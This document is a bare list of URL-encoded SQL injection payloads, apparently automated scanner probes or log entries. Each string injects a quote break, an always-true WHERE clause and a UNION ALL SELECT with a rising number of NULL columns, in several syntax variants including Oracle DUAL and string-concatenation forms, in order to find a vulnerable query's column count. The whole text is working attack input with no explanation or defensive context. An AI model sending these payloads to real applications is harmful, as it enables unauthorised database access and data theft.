1234.5%27%20WHERE%202229%3D2229%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%206758%3D6758%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208247%3D8247%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%206638%3D6638%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%201737%3D1737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%203287%3D3287%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%202532%3D2532%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207709%3D7709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%201719%3D1719%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%206129%3D6129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%206677%3D6677%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205969%3D5969%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20%7C%7C%20%28SELECT%204801%20FROM%20DUAL%20WHERE%207936%3D7936%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204705%20FROM%20DUAL%20WHERE%202095%3D2095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205130%20FROM%20DUAL%20WHERE%203649%3D3649%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208502%20FROM%20DUAL%20WHERE%207227%3D7227%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207023%20FROM%20DUAL%20WHERE%209429%3D9429%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202519%20FROM%20DUAL%20WHERE%204324%3D4324%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202227%20FROM%20DUAL%20WHERE%207022%3D7022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205552%20FROM%20DUAL%20WHERE%206228%3D6228%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205762%20FROM%20DUAL%20WHERE%201917%3D1917%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201348%20FROM%20DUAL%20WHERE%208543%3D8543%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204480%20WHERE%209847%3D9847%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203790%20WHERE%206646%3D6646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207507%20WHERE%204711%3D4711%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207528%20WHERE%202566%3D2566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208992%20WHERE%205004%3D5004%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201444%20WHERE%209292%3D9292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209254%20WHERE%204302%3D4302%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207965%20WHERE%205331%3D5331%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202410%20WHERE%203414%3D3414%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204620%20WHERE%207577%3D7577%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%202471%20FROM%20DUAL%20WHERE%201848%3D1848%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205327%20FROM%20DUAL%20WHERE%204876%3D4876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209090%20FROM%20DUAL%20WHERE%203766%3D3766%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205308%20FROM%20DUAL%20WHERE%208348%3D8348%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206712%20FROM%20DUAL%20WHERE%206729%3D6729%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209937%20FROM%20DUAL%20WHERE%203385%3D3385%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202845%20FROM%20DUAL%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206233%20FROM%20DUAL%20WHERE%201128%3D1128%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205894%20FROM%20DUAL%20WHERE%202368%3D2368%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208724%20FROM%20DUAL%20WHERE%205973%3D5973%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209735%20WHERE%201063%3D1063%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206027%20WHERE%207589%3D7589%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206483%20WHERE%208408%3D8408%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202113%20WHERE%206077%3D6077%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202155%20WHERE%205733%3D5733%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207402%20WHERE%202112%3D2112%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206595%20WHERE%209068%3D9068%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207098%20WHERE%203817%3D3817%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205779%20WHERE%204516%3D4516%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%201314%20WHERE%203180%3D3180%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27jMjc%27%20FROM%20DUAL%20WHERE%203043%3D3043%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27leKP%27%20FROM%20DUAL%20WHERE%202429%3D2429%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27GvSX%27%20FROM%20DUAL%20WHERE%207766%3D7766%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WCFZ%27%20FROM%20DUAL%20WHERE%206532%3D6532%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 